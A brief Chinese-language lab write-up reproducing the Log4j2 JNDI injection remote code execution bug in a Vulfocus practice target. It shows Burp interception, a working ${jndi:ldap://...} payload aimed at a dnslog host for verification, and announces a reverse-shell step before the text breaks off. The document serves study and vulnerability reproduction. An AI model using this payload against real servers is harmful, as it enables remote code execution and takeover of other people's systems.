简介
2021 年 12 月 9 日晚,Log4j2 的一个远程代码执行漏洞的利用细节被公开。攻击者使用 ${}
关键标识符触发 JNDI 注入漏洞,当程序将用户输入的数据进行日志记录时,即可触发此漏洞,成功利用此漏洞可以在目标服务器上执行任意代码。
复现
直接在vulfocus起一个靶场环境
burp抓包,看到提示参数是payload
dnslog验证
先来使用dnslog验证一下
${jndi:ldap://“ip”/poc} 这里的ip是dnslog获取到的域名
生成的payload需要url编码,下面可以看到验证成功,说明存在log4j,然后我们反弹shell拿权限
反弹shell
vps开启监